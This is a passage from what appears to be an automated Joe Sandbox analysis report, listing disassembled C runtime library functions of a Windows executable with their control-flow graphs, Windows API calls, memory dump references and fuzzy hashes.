                                                                                                                                                                                                                                                          • Part of subcall function 00AC62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00AC7E5B,?,00000000,?,00AC686F,?,00000004,00000000,?,?,?,00AC3BCD), ref: 00AC6331
                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00AC7CA4
                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00AC7CC9
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2597970681-0
                                                                                                                                                                                                                                                        • Opcode ID: 7354f109ab668ffdb74d85f4dd642d73543f3de10307db0745dbdabea77b466a
                                                                                                                                                                                                                                                        • Instruction ID: b2cc960ee0de2f09d7489a5d132b9c4fe1937bd3e57475e74dac8be81c8d68cb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7354f109ab668ffdb74d85f4dd642d73543f3de10307db0745dbdabea77b466a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35519172618217ABDB259F64CD81FBF77AAEB44760F16462DFC05E6140EB34DC40DAA0
                                                                                                                                                                                                                                                        Function 00AC8417 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 230 ac8417-ac8474 GetConsoleCP 231 ac847a-ac8496 230->231 232 ac85b7-ac85c9 call ac123a 230->232 234 ac8498-ac84af 231->234 235 ac84b1-ac84c2 call ac6052 231->235 237 ac84eb-ac84fa call ac72b7 234->237 242 ac84e8-ac84ea 235->242 243 ac84c4-ac84c7 235->243 237->232 244 ac8500-ac8520 WideCharToMultiByte 237->244 242->237 245 ac84cd-ac84df call ac72b7 243->245 246 ac858e-ac85ad 243->246 244->232 248 ac8526-ac853c WriteFile 244->248 245->232 252 ac84e5-ac84e6 245->252 246->232 250 ac853e-ac854f 248->250 251 ac85af-ac85b5 GetLastError 248->251 250->232 253 ac8551-ac8555 250->253 251->232 252->244 254 ac8557-ac8575 WriteFile 253->254 255 ac8583-ac8586 253->255 254->251 256 ac8577-ac857b 254->256 255->231 257 ac858c 255->257 256->232 258 ac857d-ac8580 256->258 257->232 258->255
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00AC8B8C,?,00000000,?,00000000,00000000), ref: 00AC8459
                                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 00AC84D4
                                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 00AC84EF
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00AC8515
                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,00AC8B8C,00000000,?,?,?,?,?,?,?,?,?,00AC8B8C,?), ref: 00AC8534
                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,00AC8B8C,00000000,?,?,?,?,?,?,?,?,?,00AC8B8C,?), ref: 00AC856D
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1324828854-0
                                                                                                                                                                                                                                                        • Opcode ID: a90aa92d08c2d0677597abbd9542e782207eea801ce53d17374e254a32bbe350
                                                                                                                                                                                                                                                        • Instruction ID: a984bc896e9ac0149da63b9292a77d425cad23a405cb9315f07a8c3d6fc270f8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a90aa92d08c2d0677597abbd9542e782207eea801ce53d17374e254a32bbe350
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3516C71A00249AFDB10CFA8D885FEEBBF8FF19300F15411AE956E7291DB759941CBA0
                                                                                                                                                                                                                                                        Function 00AC1E00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 259 ac1e00-ac1e51 call acac80 call ac1dc0 call ac2377 266 ac1ead-ac1eb0 259->266 267 ac1e53-ac1e65 259->267 268 ac1ed0-ac1ed9 266->268 269 ac1eb2-ac1ebf call ac2360 266->269 267->268 270 ac1e67-ac1e7e 267->270 276 ac1ec4-ac1ecd call ac1dc0 269->276 272 ac1e94 270->272 273 ac1e80-ac1e8e call ac2300 270->273 275 ac1e97-ac1e9c 272->275 280 ac1ea4-ac1eab 273->280 281 ac1e90 273->281 275->270 278 ac1e9e-ac1ea0 275->278 276->268 278->268 282 ac1ea2 278->282 280->276 284 ac1eda-ac1ee3 281->284 285 ac1e92 281->285 282->276 286 ac1f1d-ac1f2d call ac2340 284->286 287 ac1ee5-ac1eec 284->287 285->275 293 ac1f2f-ac1f3e call ac2360 286->293 294 ac1f41-ac1f5d call ac1dc0 call ac2320 286->294 287->286 288 ac1eee-ac1efd call acaac0 287->288 296 ac1eff-ac1f17 288->296 297 ac1f1a 288->297 293->294 296->297 297->286
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00AC1E37
                                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00AC1E3F
                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00AC1EC8
                                                                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00AC1EF3
                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00AC1F48
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                        • Opcode ID: 7d36b362f6360c22c196545a310ae4e8885f054fcc5504ea06725e0c53a6382b
                                                                                                                                                                                                                                                        • Instruction ID: 75c1f653baae00a3f6e7a675ab1b42eed3e893fb3e377afcc3b0ad4c22f3aadf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d36b362f6360c22c196545a310ae4e8885f054fcc5504ea06725e0c53a6382b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7041B034B00248ABCF10DF68C885FAEBBB5BF46354F16855DE8159B392D735EA01CB91
                                                                                                                                                                                                                                                        Function 00AC621B Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 305 ac621b-ac6226 306 ac62fc-ac62fe 305->306 307 ac622c-ac62f9 call ac61df * 5 call ac4869 * 3 call ac61df * 5 call ac4869 * 4 305->307 307->306
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00AC61DF: _free.LIBCMT ref: 00AC6208
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC6269
                                                                                                                                                                                                                                                          • Part of subcall function 00AC4869: HeapFree.KERNEL32(00000000,00000000,?,00AC620D,?,00000000,?,00000000,?,00AC6234,?,00000007,?,?,00AC669F,?), ref: 00AC487F
                                                                                                                                                                                                                                                          • Part of subcall function 00AC4869: GetLastError.KERNEL32(?,?,00AC620D,?,00000000,?,00000000,?,00AC6234,?,00000007,?,?,00AC669F,?,?), ref: 00AC4891
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC6274
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC627F
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC62D3
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC62DE
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC62E9
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC62F4
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                        • Opcode ID: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                                                                        • Instruction ID: 519f7c745ed28f975c46ebf1715466ef9d2a34453b8c97aa3974fec8b7609d82
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08118131540B14AAE521F7B0CD17FCB779C5F44701F45492CB69AAB093DA65BA044750
                                                                                                                                                                                                                                                        Function 00AC23D1 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 342 ac23d1-ac23d8 343 ac23dd-ac23f8 GetLastError call ac26a4 342->343 344 ac23da-ac23dc 342->344 347 ac23fa-ac23fc 343->347 348 ac2411-ac2413 343->348 349 ac23fe-ac240f call ac26df 347->349 350 ac2457-ac2462 SetLastError 347->350 348->350 349->348 353 ac2415-ac2425 call ac3f67 349->353 356 ac2439-ac2449 call ac26df 353->356 357 ac2427-ac2437 call ac26df 353->357 363 ac244f-ac2456 call ac3ec5 356->363 357->356 362 ac244b-ac244d 357->362 362->363 363->350
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00AC23C8,00AC209F,00AC1AFC), ref: 00AC23DF
                                                                                                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00AC23ED
                                                                                                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AC2406
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,00AC23C8,00AC209F,00AC1AFC), ref: 00AC2458
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                                                                                                                        • Opcode ID: 9c13259b54a7b2108fbf389281c3e48ad3451509b246e358a3e33b14ff6f22ea
                                                                                                                                                                                                                                                        • Instruction ID: 5aab6fba7d0b9b40eb3c6402572fb12e828ac71ad039ce9ad232a28d87fc8c1a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9c13259b54a7b2108fbf389281c3e48ad3451509b246e358a3e33b14ff6f22ea
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E301D432119215AFAA2867F87D85F273794DB027B4B22423EF521890E4EF524C829360
                                                                                                                                                                                                                                                        Function 00AC4424 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 366 ac4424-ac4438 GetLastError 367 ac443a-ac4444 call ac5904 366->367 368 ac4446-ac444b 366->368 367->368 373 ac448f-ac449a SetLastError 367->373 370 ac444d call ac480c 368->370 372 ac4452-ac4458 370->372 374 ac445a 372->374 375 ac4463-ac4471 call ac595a 372->375 377 ac445b-ac4461 call ac4869 374->377 380 ac4476-ac448d call ac4296 call ac4869 375->380 381 ac4473-ac4474 375->381 383 ac449b-ac44a7 SetLastError call ac3f24 377->383 380->373 380->383 381->377
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000008,?,00AC6D69,?,?,?,00AD04C8,0000002C,00AC3F34,00000016,00AC209F,00AC1AFC), ref: 00AC4428
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC445B
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC4483
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00AC4490
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00AC449C
                                                                                                                                                                                                                                                        • _abort.LIBCMT ref: 00AC44A2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3160817290-0
                                                                                                                                                                                                                                                        • Opcode ID: 4fcf9dd72334a7f2176b70c4df9378646b2a87252399022abd4cbdd1ef02d126
                                                                                                                                                                                                                                                        • Instruction ID: fff13327166b14f54e4f19abfec4e969a037d3323720b2649dc005cf7c5a7acb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4fcf9dd72334a7f2176b70c4df9378646b2a87252399022abd4cbdd1ef02d126
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A5F02836510640B7C616B7B46E3AF6B276EABD9771F37851CF529D2191FF228C024228
                                                                                                                                                                                                                                                        Function 00AC36FC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 390 ac36fc-ac3724 GetModuleHandleExW 391 ac3749-ac374d 390->391 392 ac3726-ac3739 GetProcAddress 390->392 395 ac374f-ac3752 FreeLibrary 391->395 396 ac3758-ac3765 call ac123a 391->396 393 ac3748 392->393 394 ac373b-ac3746 392->394 393->391 394->393 395->396
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00AC36AD,?,?,00AC364D,?,00AD02E0,0000000C,00AC37A4,?,00000002), ref: 00AC371C
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AC372F
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00AC36AD,?,?,00AC364D,?,00AD02E0,0000000C,00AC37A4,?,00000002,00000000), ref: 00AC3752
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                        • Opcode ID: 78ba2d65f8b11bfb33e5b6f17d978d18c57343e21324fafff597dfde2314811e
                                                                                                                                                                                                                                                        • Instruction ID: 8a2d17e5432f6f8ad295e18bef2e5ef1b33abbd71b59515529fbd5983c9e032e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 78ba2d65f8b11bfb33e5b6f17d978d18c57343e21324fafff597dfde2314811e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03F04471A50208BBCB11DBD4DC4AFAEBFB4EF04752F068069F805A2150DB315E45CBA1
                                                                                                                                                                                                                                                        Function 00AC634D Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 400 ac634d-ac6372 call ac3f72 403 ac637f-ac63a5 MultiByteToWideChar 400->403 404 ac6374-ac637c 400->404 405 ac63ab-ac63b7 403->405 406 ac6444-ac6448 403->406 404->403 409 ac63b9-ac63ca 405->409 410 ac6403 405->410 407 ac644a-ac644d 406->407 408 ac6454-ac6469 call ac123a 406->408 407->408 413 ac63cc-ac63db call acac20 409->413 414 ac63e5-ac63eb 409->414 412 ac6405-ac6407 410->412 418 ac643d-ac6443 call ac646a 412->418 419 ac6409-ac642b call ac20b0 MultiByteToWideChar 412->419 413->418 425 ac63dd-ac63e3 413->425 416 ac63ec call ac62ff 414->416 421 ac63f1-ac63f6 416->421 418->406 419->418 429 ac642d-ac643b GetStringTypeW 419->429 421->418 426 ac63f8 421->426 428 ac63fe-ac6401 425->428 426->428 428->412 429->418
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,00AC54C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 00AC639A
                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00AC63D2
                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00AC6423
                                                                                                                                                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00AC6435
                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00AC643E
                                                                                                                                                                                                                                                          • Part of subcall function 00AC62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00AC7E5B,?,00000000,?,00AC686F,?,00000004,00000000,?,?,?,00AC3BCD), ref: 00AC6331
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1857427562-0
                                                                                                                                                                                                                                                        • Opcode ID: 372e7c4caf38ca781b2ba26e0afec53ebb67542734ced9b78a9dcba5953329ad
                                                                                                                                                                                                                                                        • Instruction ID: 7a0a2b6c8af34415844d8a5b3334009891febce4da0abdbed75e3beefc7ffcb0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 372e7c4caf38ca781b2ba26e0afec53ebb67542734ced9b78a9dcba5953329ad
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2831B072A1021AABDF29DFA4DD45EAE7BA5EF00310F06412DFC14DA250EB35CD51CBA0
                                                                                                                                                                                                                                                        Function 00AC561E Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 430 ac561e-ac5633 GetEnvironmentStringsW 431 ac568b 430->431 432 ac5635-ac5655 call ac55e7 WideCharToMultiByte 430->432 433 ac568d-ac568f 431->433 432->431 438 ac5657 432->438 435 ac5698-ac56a0 433->435 436 ac5691-ac5692 FreeEnvironmentStringsW 433->436 436->435 439 ac5658 call ac62ff 438->439 440 ac565d-ac5662 439->440 441 ac5664-ac5678 WideCharToMultiByte 440->441 442 ac5680 440->442 441->442 443 ac567a-ac567e 441->443 444 ac5682-ac5689 call ac4869 442->444 443->444 444->433
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 00AC5627
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00AC564A
                                                                                                                                                                                                                                                          • Part of subcall function 00AC62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00AC7E5B,?,00000000,?,00AC686F,?,00000004,00000000,?,?,?,00AC3BCD), ref: 00AC6331
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00AC5670
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC5683
                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00AC5692
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2278895681-0
                                                                                                                                                                                                                                                        • Opcode ID: 3554cd88993eb7e2b61d49f3b53d4d35249dc659d4e36b70e8c0f10350533ad3
                                                                                                                                                                                                                                                        • Instruction ID: 84e2395dabeb1931112c60ac1ea4506e5bf1450cf3e5309e2b317f497992f05e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3554cd88993eb7e2b61d49f3b53d4d35249dc659d4e36b70e8c0f10350533ad3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F201F772A01A157F27215BB65C4DE7B6ABDDEC6BA035B012DF804C3100EB619C0282B0
                                                                                                                                                                                                                                                        Function 00AC44A8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
